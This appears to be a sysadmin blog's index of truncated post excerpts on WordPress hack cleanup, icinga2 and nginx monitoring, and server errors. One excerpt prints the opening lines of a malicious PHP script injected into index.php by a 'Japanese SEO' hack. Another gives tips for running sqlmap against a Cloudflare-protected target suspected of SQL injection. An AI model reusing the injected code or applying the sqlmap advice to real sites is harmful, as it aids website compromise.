How to restore hacked WordPress website? v2

BACKUP!! BACKUP!! BACKUP!! Make sure you do backup regularly or at least ask your clients’ to take a clean backup of website. Change Password After your website gets hacked, first thing to do is to make sure that you change passwords ie: cpanel, database, wp-admin, etc Replace Files/Folders 1. Rename public_html folder to something else […]

Japanese seo hack WordPress

Japanese seo in google

Ever encountered php unknown code injected at top of your index.php file? I have same issue in my WordPress website where some unknown php scripts was injected at top of index.php file. Below is the sample of that php code: &lt?php @set_time_limit(3600); @ignore_user_abort(1); $xmlname = ‘mapss271.xml’; $jdir = ”; $smuri_tmp = smrequest_uri(); if($smuri_tmp==”){ $smuri_tmp=’/’; } […]

How to monitor Linux servers in icinga2?

This is third part. Previously, we have installed icinga2 and icingaweb2. Now, we are going to monitor basic services of Linux server. I assume you have followed how to install icinga2 and how to install icingaweb2 post. master server ip: master server hostname: client server ip: client server hostname: In master […]

How to install icinga2 in centos?

This post will show how to install icinga2 in centos linux server to monitor different servers. Icinga 2 is an open source monitoring system which checks the availability of your network resources, notifies users of outages, and generates performance data for reporting. Add Icinga repository RHEL/CentOS 7 # yum install RHEL/CentOS 6 # yum […]

Forward nginx stats in from collectd to influxdb

Requirement Nginx must be compiled with HttpStubStatusModule​ module. You can check that by running following command: nginx -V 2>&1 | grep -o with-http_stub_status_module If you see following output, you are good to go ahead. Otherwise, you have to install nginx with this module. with-http_stub_status_module Nginx Config $ sudo vi /etc/nginx/conf.d/status.conf server { listen; location […]

WordPress wp-admin/async-upload.php 403 Forbidden

I was trying to upload image from WordPess media and was getting 403 message. I searched and tried every method. Some of them include: disabled modsecurity created alternate uploads folder given 777 permission to uploads folder At last I turned on WP_DEBUG log and got following error: WordPress database error: [Duplicate entry ‘794356’ for key […]

Bypass Cloudflare protected sites with sqlmap

When you suspect your target site is vulnerable to SQLi and you find out that it is protected by Cloudflare, you can still to launch SQLMap against the target. First of all, you need to make sure the target site is protected by Cloudflare, you can add “–identify-waf” to confirm. However, do not set “–thread=” […]

Failed to access DBM file “/var/cpanel/secdatadir/ip”: Permission denied

If you have applied modsecurity rules either from OWASP or COMODO, you may see below error in /usr/local/apache/logs/error_log: Failed to access DBM file “/var/cpanel/secdatadir/ip”: Permission denied This is because you are using apache chroot jailed vhosts and mod_ruid2. To make it accessible you may have to change secdatadir to /var/log and give appropriate permission to […]